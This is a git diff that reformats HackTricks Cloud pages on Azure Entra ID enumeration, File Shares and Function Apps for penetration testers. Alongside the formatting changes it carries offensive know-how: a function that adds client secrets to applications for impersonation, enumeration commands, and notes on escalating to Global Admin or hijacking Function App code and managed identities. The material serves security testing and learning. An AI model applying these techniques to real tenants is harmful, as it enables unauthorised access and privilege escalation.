@@ -530,7 +539,7 @@ Function Add-AzADAppSecret Add client secret to the applications. .PARAMETER GraphToken - Pass the Graph API Token + Pass the Graph API Token .EXAMPLE PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..' @@ -562,7 +571,7 @@ Function Add-AzADAppSecret } try - { + { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch @@ -594,7 +603,7 @@ Function Add-AzADAppSecret "displayName" = "Password" } } - + try { $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) @@ -607,13 +616,13 @@ Function Add-AzADAppSecret } catch { - Write-Output "Failed to add new client secret to '$($App.displayName)' Application." + Write-Output "Failed to add new client secret to '$($App.displayName)' Application." } } if($Details -ne $null) { Write-Output "" - Write-Output "Client secret added to : " + Write-Output "Client secret added to : " Write-Output $Details | fl * } } @@ -630,17 +639,18 @@ Function Add-AzADAppSecret For more information about Applications check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} When an App is generated 2 types of permissions are given: -* **Permissions** given to the **Service Principal** -* **Permissions** the **app** can have and use on **behalf of the user**. +- **Permissions** given to the **Service Principal** +- **Permissions** the **app** can have and use on **behalf of the user**. + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```bash # List Apps az ad app list 
@@ -656,9 +666,11 @@ az ad app list --show-mine # Get apps with generated secret or certificate az ad app list --query '[?length(keyCredentials) > `0` || length(passwordCredentials) > `0`].[displayName, appId, keyCredentials, passwordCredentials]' -o json ``` -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # List all registered applications Get-AzureADApplication -All $true @@ -669,9 +681,11 @@ Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredentia # Get owner of an application Get-AzureADApplication -ObjectId | Get-AzureADApplicationOwner |fl * ``` -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get Apps Get-AzADApplication 
@@ -682,21 +696,20 @@ Get-AzADApplication | ?{$_.DisplayName -match "app"} # Get Apps with password Get-AzADAppCredential ``` -{% endtab %} -{% endtabs %} -{% hint style="warning" %} -An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\ -For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48). -{% endhint %} +{{#endtab }} +{{#endtabs }} -{% hint style="info" %} -A secret string that the application uses to prove its identity when requesting a token is the application password.\ -So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\ -Note that this password is only visible when generated (you could change it but you cannot get it again).\ -The **owner** of the **application** can **add a password** to it (so he can impersonate it).\ -Logins as these service principals are **not marked as risky** and they **won't have MFA.** -{% endhint %} +> [!WARNING] +> An app with the permission **`AppRoleAssignment.ReadWrite`** can **escalate to Global Admin** by grating itself the role.\ +> For more information [**check this**](https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48). 
+ +> [!NOTE] +> A secret string that the application uses to prove its identity when requesting a token is the application password.\ +> So, if find this **password** you can access as the **service principal** **inside** the **tenant**.\ +> Note that this password is only visible when generated (you could change it but you cannot get it again).\ +> The **owner** of the **application** can **add a password** to it (so he can impersonate it).\ +> Logins as these service principals are **not marked as risky** and they **won't have MFA.** It's possible to find a list of commonly used App IDs that belongs to Microsoft in [https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications](https://learn.microsoft.com/en-us/troubleshoot/entra/entra-id/governance/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications) @@ -704,31 +717,33 @@ It's possible to find a list of commonly used App IDs that belongs to Microsoft For more information about Managed Identities check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```bash # List all manged identities az identity list --output table # With the principal ID you can continue the enumeration in service principals ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Azure Roles For more information about Azure roles check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} ```bash # Get roles az role definition list 
@@ -750,10 +765,11 @@ az role assignment list --assignee "" --all --output table # Get all the roles assigned to a user by filtering az role assignment list --all --query "[?principalName=='carlos@carloshacktricks.onmicrosoft.com']" --output table ``` -{% endcode %} -{% endtab %} -{% tab title="Az PowerShell" %} +{{#endtab }} + +{{#tab name="Az PowerShell" }} + ```powershell # Get role assignments on the subscription Get-AzRoleDefinition @@ -763,9 +779,11 @@ Get-AzRoleDefinition -Name "Virtual Machine Command Executor" Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Compute/virtualMachines/ ``` -{% endtab %} -{% tab title="Raw" %} +{{#endtab }} + +{{#tab name="Raw" }} + ```powershell # Get permissions over a resource using ARM directly $Token = (Get-AzAccessToken).Token @@ -777,22 +795,23 @@ $RequestParams = @{ 'Authorization' = "Bearer $Token" } } -(Invoke-RestMethod @RequestParams).value +(Invoke-RestMethod @RequestParams).value ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Entra ID Roles For more information about Azure roles check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} ```bash # List template Entra ID roles az rest --method GET \ @@ -836,10 +855,11 @@ az rest --method GET \ --query "value[]" \ --output json ``` -{% endcode %} -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # Get all available role templates Get-AzureADDirectoryroleTemplate 
@@ -854,19 +874,23 @@ Get-AzureADDirectoryRole -ObjectId | fl # Roles of the Administrative Unit (who has permissions over the administrative unit and its members) Get-AzureADMSScopedRoleMembership -Id | fl * ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ### Devices -{% tabs %} -{% tab title="az cli" %} +{{#tabs }} +{{#tab name="az cli" }} + ```bash # If you know how to do this send a PR! ``` -{% endtab %} -{% tab title="Azure AD" %} +{{#endtab }} + +{{#tab name="Azure AD" }} + ```powershell # Enumerate Devices Get-AzureADDevice -All $true | fl * @@ -885,24 +909,25 @@ Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com # Get Administrative Units of a device Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} } ``` -{% endtab %} -{% endtabs %} -{% hint style="warning" %} -If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\ -Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**. -{% endhint %} +{{#endtab }} +{{#endtabs }} + +> [!WARNING] +> If a device (VM) is **AzureAD joined**, users from AzureAD are going to be **able to login**.\ +> Moreover, if the logged user is **Owner** of the device, he is going to be **local admin**. ### Administrative Units For more information about administrative units check: -{% content-ref url="../az-basic-information/" %} -[az-basic-information](../az-basic-information/) -{% endcontent-ref %} +{{#ref}} +../az-basic-information/ +{{#endref}} + +{{#tabs }} +{{#tab name="az cli" }} -{% tabs %} -{% tab title="az cli" %} ```bash # List all administrative units az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits" 
@@ -913,9 +938,11 @@ az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administr # Get principals with roles over the AU az rest --method GET --uri "https://graph.microsoft.com/v1.0/directory/administrativeUnits/a76fd255-3e5e-405b-811b-da85c715ff53/scopedRoleMembers" ``` -{% endtab %} -{% tab title="AzureAD" %} +{{#endtab }} + +{{#tab name="AzureAD" }} + ```powershell # Get Administrative Units Get-AzureADMSAdministrativeUnit @@ -927,20 +954,21 @@ Get-AzureADMSAdministrativeUnitMember -Id # Get the roles users have over the members of the AU Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} ## Entra ID Privilege Escalation -{% content-ref url="../az-privilege-escalation/az-entraid-privesc/" %} -[az-entraid-privesc](../az-privilege-escalation/az-entraid-privesc/) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-entraid-privesc/ +{{#endref}} ## Azure Privilege Escalation -{% content-ref url="../az-privilege-escalation/az-authorization-privesc.md" %} -[az-authorization-privesc.md](../az-privilege-escalation/az-authorization-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-authorization-privesc.md +{{#endref}} ## Defensive Mechanisms @@ -953,26 +981,26 @@ Note that the user will also be able to ask to **extend** the time. Moreover, **PIM send emails** whenever a privileged role is being assigned to someone. -
+
When PIM is enabled it's possible to configure each role with certain requirements like: -* Maximum duration (hours) of activation -* Require MFA on activation -* Require Conditional Access acuthenticaiton context -* Require justification on activation -* Require ticket information on activation -* Require approval to activate -* Max time to expire the elegible assignments -* A lot more configuration on when and who to send notifications when certain actions happen with that role +- Maximum duration (hours) of activation +- Require MFA on activation +- Require Conditional Access acuthenticaiton context +- Require justification on activation +- Require ticket information on activation +- Require approval to activate +- Max time to expire the elegible assignments +- A lot more configuration on when and who to send notifications when certain actions happen with that role ### Conditional Access Policies Check: -{% content-ref url="../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md" %} -[az-conditional-access-policies-mfa-bypass.md](../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +{{#endref}} ### Entra Identity Protection @@ -980,24 +1008,24 @@ Entra Identity Protection is a security service that allows to **detect when a u It allows the admin to configure it to **block** attempts when the risk is "Low and above", "Medium and above" or "High". Although, by default it's completely **disabled**: -
+
-{% hint style="success" %} -Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options. -{% endhint %} +> [!TIP] +> Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options. ### Entra Password Protection -Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\ +Entra Password Protection ([https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\ It also allows to **ban a custom password list** that you need to provide. It can be **applied both** at the cloud level and on-premises Active Directory. The default mode is **Audit**: -
+
## References -* [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units) +- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/az-file-shares.md b/src/pentesting-cloud/azure-security/az-services/az-file-shares.md similarity index 58% rename from pentesting-cloud/azure-security/az-services/az-file-shares.md rename to src/pentesting-cloud/azure-security/az-services/az-file-shares.md index 5ca733e45..3d6fb67b6 100644 --- a/pentesting-cloud/azure-security/az-services/az-file-shares.md +++ b/src/pentesting-cloud/azure-security/az-services/az-file-shares.md @@ -1,19 +1,6 @@ # Az - File Shares -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -21,32 +8,31 @@ Learn & practice GCP Hacking: --share-name --snapshot # Download snapshot/backup az storage file download-batch -d . --account-name --source --snapshot ``` -{% endcode %} -{% endtab %} -{% tab title="Az PowerShell" %} -{% code overflow="wrap" %} +{{#endtab}} + +{{#tab name="Az PowerShell"}} + ```powershell Get-AzStorageAccount @@ -93,18 +79,16 @@ Get-AzStorageShare -Context (Get-AzStorageAccount -ResourceGroupName "" -Context (New-AzStorageContext -StorageAccountName "" -StorageAccountKey (Get-AzStorageAccountKey -ResourceGroupName "" -Name "" | Select-Object -ExpandProperty Value) -SnapshotTime "") ``` -{% endcode %} -{% endtab %} -{% endtabs %} -{% hint style="info" %} -By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`. -{% endhint %} +{{#endtab}} +{{#endtabs}} -{% hint style="success" %} -Use the param `--account-key` to indicate the account key to use\ -Use the param `--sas-token` with the SAS token to access via a SAS token -{% endhint %} +> [!NOTE] +> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`. + +> [!TIP] +> Use the param `--account-key` to indicate the account key to use\ +> Use the param `--sas-token` with the SAS token to access via a SAS token ### Connection 
@@ -112,9 +96,9 @@ These are the scripts proposed by Azure at the time of the writing to connect a You need to replace the ``, `` and `` placeholders. -{% tabs %} -{% tab title="Windows" %} -{% code overflow="wrap" %} +{{#tabs}} +{{#tab name="Windows"}} + ```powershell $connectTestResult = Test-NetConnection -ComputerName filescontainersrdtfgvhb.file.core.windows.net -Port 445 if ($connectTestResult.TcpTestSucceeded) { @@ -126,11 +110,11 @@ if ($connectTestResult.TcpTestSucceeded) { Write-Error -Message "Unable to reach the Azure storage account via port 445. Check to make sure your organization or ISP is not blocking port 445, or use Azure P2S VPN, Azure S2S VPN, or Express Route to tunnel SMB traffic over a different port." } ``` -{% endcode %} -{% endtab %} -{% tab title="Linux" %} -{% code overflow="wrap" %} +{{#endtab}} + +{{#tab name="Linux"}} + ```bash sudo mkdir /mnt/disk-shareeifrube if [ ! -d "/etc/smbcredentials" ]; then 
@@ -145,57 +129,44 @@ sudo chmod 600 /etc/smbcredentials/.cred sudo bash -c 'echo "//.file.core.windows.net/ /mnt/ cifs nofail,credentials=/etc/smbcredentials/.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30" >> /etc/fstab' sudo mount -t cifs //.file.core.windows.net/ /mnt/ -o credentials=/etc/smbcredentials/.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30 ``` -{% endcode %} -{% endtab %} -{% tab title="macOS" %} -{% code overflow="wrap" %} +{{#endtab}} + +{{#tab name="macOS"}} + ```bash open smb://:@.file.core.windows.net/ ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab}} +{{#endtabs}} ### Regular storage enumeration (access keys, SAS...) -{% content-ref url="az-storage.md" %} -[az-storage.md](az-storage.md) -{% endcontent-ref %} +{{#ref}} +az-storage.md +{{#endref}} ## Privilege Escalation Same as storage privesc: -{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %} -[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md) -{% endcontent-ref %} +{{#ref}} +../az-privilege-escalation/az-storage-privesc.md +{{#endref}} ## Post Exploitation -{% content-ref url="../az-post-exploitation/az-file-share-post-exploitation.md" %} -[az-file-share-post-exploitation.md](../az-post-exploitation/az-file-share-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../az-post-exploitation/az-file-share-post-exploitation.md +{{#endref}} ## Persistence Same as storage persistence: -{% content-ref url="../az-persistence/az-storage-persistence.md" %} -[az-storage-persistence.md](../az-persistence/az-storage-persistence.md) -{% endcontent-ref %} +{{#ref}} +../az-persistence/az-storage-persistence.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-services/az-function-apps.md b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md similarity index 66% rename from pentesting-cloud/azure-security/az-services/az-function-apps.md rename to src/pentesting-cloud/azure-security/az-services/az-function-apps.md index a446ab37d..782dc2d1c 100644 --- a/pentesting-cloud/azure-security/az-services/az-function-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md @@ -1,35 +1,21 @@ # Az - Function Apps -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information **Azure Function Apps** are a **serverless compute service** that allow you to run small pieces of code, called **functions**, without managing the underlying infrastructure. They are designed to execute code in response to various triggers, such as **HTTP requests, timers, or events from other Azure services** like Blob Storage or Event Hubs. Function Apps support multiple programming languages, including C#, Python, JavaScript, and Java, making them versatile for building **event-driven applications**, automating workflows, or integrating services. They are cost-effective, as you usually only pay for the compute time used when your code runs. -{% hint style="info" %} -Note that **Functions are a subset of the App Services**, therefore, a lot of the features discussed here will be used also by applications created as Azure Apps (`webapp` in cli). -{% endhint %} +> [!NOTE] +> Note that **Functions are a subset of the App Services**, therefore, a lot of the features discussed here will be used also by applications created as Azure Apps (`webapp` in cli). ### Different Plans -* **Flex Consumption Plan**: Offers **dynamic, event-driven scaling** with pay-as-you-go pricing, adding or removing function instances based on demand. It supports **virtual networking** and **pre-provisioned instances** to reduce cold starts, making it suitable for **variable workloads** that don’t require container support. -* **Traditional Consumption Plan**: The default serverless option, where you **pay only for compute resources when functions run**. It automatically scales based on incoming events and includes **cold start optimizations**, but does not support container deployments. Ideal for **intermittent workloads** requiring automatic scaling. -* **Premium Plan**: Designed for **consistent performance**, with **prewarmed workers** to eliminate cold starts. 
It offers **extended execution times, virtual networking**, and supports **custom Linux images**, making it perfect for **mission-critical applications** needing high performance and advanced features. -* **Dedicated Plan**: Runs on dedicated virtual machines with **predictable billing** and supports manual or automatic scaling. It allows running multiple apps on the same plan, provides **compute isolation**, and ensures **secure network access** via App Service Environments, making it ideal for **long-running applications** needing consistent resource allocation. -* **Container Apps**: Enables deploying **containerized function apps** in a managed environment, alongside microservices and APIs. It supports custom libraries, legacy app migration, and **GPU processing**, eliminating Kubernetes cluster management. Ideal for **event-driven, scalable containerized applications**. +- **Flex Consumption Plan**: Offers **dynamic, event-driven scaling** with pay-as-you-go pricing, adding or removing function instances based on demand. It supports **virtual networking** and **pre-provisioned instances** to reduce cold starts, making it suitable for **variable workloads** that don’t require container support. +- **Traditional Consumption Plan**: The default serverless option, where you **pay only for compute resources when functions run**. It automatically scales based on incoming events and includes **cold start optimizations**, but does not support container deployments. Ideal for **intermittent workloads** requiring automatic scaling. +- **Premium Plan**: Designed for **consistent performance**, with **prewarmed workers** to eliminate cold starts. It offers **extended execution times, virtual networking**, and supports **custom Linux images**, making it perfect for **mission-critical applications** needing high performance and advanced features. +- **Dedicated Plan**: Runs on dedicated virtual machines with **predictable billing** and supports manual or automatic scaling. 
It allows running multiple apps on the same plan, provides **compute isolation**, and ensures **secure network access** via App Service Environments, making it ideal for **long-running applications** needing consistent resource allocation. +- **Container Apps**: Enables deploying **containerized function apps** in a managed environment, alongside microservices and APIs. It supports custom libraries, legacy app migration, and **GPU processing**, eliminating Kubernetes cluster management. Ideal for **event-driven, scalable containerized applications**. ### **Storage Buckets** @@ -37,11 +23,10 @@ When creating a new Function App not containerised (but giving the code to run), Moreover, modifying the code inside the bucket (in the different formats it could be stored), the **code of the app will be modified to the new one and executed** next time the Function is called. -{% hint style="danger" %} -This is very interesting from an attackers perspective as **write access over this bucket** will allow an attacker to **compromise the code and escalate privileges** to the managed identities inside the Function App. - -More on this in the **privilege escalation section**. -{% endhint %} +> [!CAUTION] +> This is very interesting from an attackers perspective as **write access over this bucket** will allow an attacker to **compromise the code and escalate privileges** to the managed identities inside the Function App. +> +> More on this in the **privilege escalation section**. It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside. 
@@ -51,12 +36,11 @@ Note that Functions also allow to store the code in a remote location just indic Using a HTTP trigger: -* It's possible to give **access to a function to from all Internet** without requiring any authentication or give access IAM based. Although it’s also possible to restrict this access. -* It's also possible to **give or restrict access** to a Function App from **an internal network (VPC)**. +- It's possible to give **access to a function to from all Internet** without requiring any authentication or give access IAM based. Although it’s also possible to restrict this access. +- It's also possible to **give or restrict access** to a Function App from **an internal network (VPC)**. -{% hint style="danger" %} -This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Function exposed to the Internet. -{% endhint %} +> [!CAUTION] +> This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Function exposed to the Internet. ### **Function App Settings & Environment Variables** 
@@ -76,11 +60,10 @@ Just like [**VMs**](vms/), Functions can have **Managed Identities** of 2 types: The **system assigned** one will be a managed identity that **only the function** that has it assigned would be able to use, while the **user assigned** managed identities are managed identities that **any other Azure service will be able to use**. -{% hint style="info" %} -Just like in [**VMs**](vms/), Functions can have **1 system assigned** managed identity and **several user assigned** ones, so it's always important to try to find all of them if you compromise the function because you might be able to escalate privileges to several managed identities from just one Function. - -If a no system managed identity is used but one or more user managed identities are attached to a function, by default you won’t be able to get any token. -{% endhint %} +> [!NOTE] +> Just like in [**VMs**](vms/), Functions can have **1 system assigned** managed identity and **several user assigned** ones, so it's always important to try to find all of them if you compromise the function because you might be able to escalate privileges to several managed identities from just one Function. +> +> If a no system managed identity is used but one or more user managed identities are attached to a function, by default you won’t be able to get any token. It's possible to use the [**PEASS scripts**](https://github.com/peass-ng/PEASS-ng) to get tokens from the default managed identity from the metadata endpoint. Or you could get them **manually** as explained in: 
@@ -90,36 +73,34 @@ Note that you need to find out a way to **check all the Managed Identities a fun ## Access Keys -{% hint style="info" %} -Note that there aren't RBAC permissions to give access to users to invoke the functions. The **function invocation depends on the trigger** selected when it was created and if a HTTP Trigger was selected, it might be needed to use an **access key**. -{% endhint %} +> [!NOTE] +> Note that there aren't RBAC permissions to give access to users to invoke the functions. The **function invocation depends on the trigger** selected when it was created and if a HTTP Trigger was selected, it might be needed to use an **access key**. When creating an endpoint inside a function using a **HTTP trigger** it's possible to indicate the **access key authorization level** needed to trigger the function. Three options are available: -* **ANONYMOUS**: **Everyone** can access the function by the URL. -* **FUNCTION**: Endpoint is only accessible to users using a **function, host or master key**. -* **ADMIN**: Endpoint is only accessible to users a **master key**. +- **ANONYMOUS**: **Everyone** can access the function by the URL. +- **FUNCTION**: Endpoint is only accessible to users using a **function, host or master key**. +- **ADMIN**: Endpoint is only accessible to users a **master key**. **Type of keys:** -* **Function Keys:** Function keys can be either default or user-defined and are designed to grant access exclusively to **specific function endpoints** within a Function App allowing a more fine-grained access over the endpoints. -* **Host Keys:** Host keys, which can also be default or user-defined, provide access to **all function endpoints within a Function App with FUNCTION access level**. -* **Master Key:** The master key (`_master`) serves as an administrative key that offers elevated permissions, including access to all function endpoints (ADMIN access lelvel included). 
This **key cannot be revoked.** -* **System Keys:** System keys are **managed by specific extensions** and are required for accessing webhook endpoints used by internal components. Examples include the Event Grid trigger and Durable Functions, which utilize system keys to securely interact with their respective APIs. +- **Function Keys:** Function keys can be either default or user-defined and are designed to grant access exclusively to **specific function endpoints** within a Function App allowing a more fine-grained access over the endpoints. +- **Host Keys:** Host keys, which can also be default or user-defined, provide access to **all function endpoints within a Function App with FUNCTION access level**. +- **Master Key:** The master key (`_master`) serves as an administrative key that offers elevated permissions, including access to all function endpoints (ADMIN access lelvel included). This **key cannot be revoked.** +- **System Keys:** System keys are **managed by specific extensions** and are required for accessing webhook endpoints used by internal components. Examples include the Event Grid trigger and Durable Functions, which utilize system keys to securely interact with their respective APIs. -{% hint style="success" %} -Example to access a function API endpoint using a key: - -`https://.azurewebsites.net/api/?code=` -{% endhint %} +> [!TIP] +> Example to access a function API endpoint using a key: +> +> `https://.azurewebsites.net/api/?code=` ### Basic Authentication Just like in App Services, Functions also support basic authentication to connect to **SCM** and **FTP** to deploy code using a **username and password in a URL** provided by Azure. More information about it in: -{% content-ref url="az-app-services.md" %} -[az-app-services.md](az-app-services.md) -{% endcontent-ref %} +{{#ref}} +az-app-service.md +{{#endref}} ### Github Based Deployments 
@@ -143,8 +124,8 @@ on: workflow_dispatch: env: - AZURE_FUNCTIONAPP_PACKAGE_PATH: '.' # set this to the path to your web app project, defaults to the repository root - PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8) + AZURE_FUNCTIONAPP_PACKAGE_PATH: "." # set this to the path to your web app project, defaults to the repository root + PYTHON_VERSION: "3.11" # set this to the python version to use (supports 3.6, 3.7, 3.8) jobs: build: @@ -182,7 +163,7 @@ jobs: deploy: runs-on: ubuntu-latest needs: build - + permissions: id-token: write #This is required for requesting the JWT @@ -193,8 +174,8 @@ jobs: name: python-app - name: Unzip artifact for deployment - run: unzip release.zip - + run: unzip release.zip + - name: Login to Azure uses: azure/login@v2 with: @@ -202,33 +183,30 @@ jobs: tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_7E50AEF6222E4C3DA9272D27FB169CCD }} subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_905358F484A74277BDC20978459F26F4 }} - - name: 'Deploy to Azure Functions' + - name: "Deploy to Azure Functions" uses: Azure/functions-action@v1 id: deploy-to-function with: - app-name: 'funcGithub' - slot-name: 'Production' + app-name: "funcGithub" + slot-name: "Production" package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }} - ```
Moreover, a **Managed Identity** is also created so the Github Action from the repository will be able to login into Azure with it. This is done by generating a Federated credential over the **Managed Identity** allowing the **Issuer** `https://token.actions.githubusercontent.com` and the **Subject Identifier** `repo:/:ref:refs/heads/`. -{% hint style="danger" %} -Therefore, anyone compromising that repo will be able to compromise the function and the Managed Identities attached to it. -{% endhint %} +> [!CAUTION] +> Therefore, anyone compromising that repo will be able to compromise the function and the Managed Identities attached to it. ### Container Based Deployments -Not all the plans allow to deploy containers, but for the ones that do, the configuration will contain the URL of the container. In the API the **`linuxFxVersion`** setting will ha something like: `DOCKER|mcr.microsoft.com/...`, while in the web console, the configuration will show the **image settings**. +Not all the plans allow to deploy containers, but for the ones that do, the configuration will contain the URL of the container. In the API the **`linuxFxVersion`** setting will ha something like: `DOCKER|mcr.microsoft.com/...`, while in the web console, the configuration will show the **image settings**. Moreover, **no source code will be stored in the storage** account related to the function as it's not needed. ## Enumeration -{% code overflow="wrap" %} ```bash # List all the functions az functionapp list @@ -249,7 +227,7 @@ az functionapp deployment source show \ az functionapp config container show \ --name \ --resource-group - + # Get settings (and privesc to the sorage account) az functionapp config appsettings list --name --resource-group 
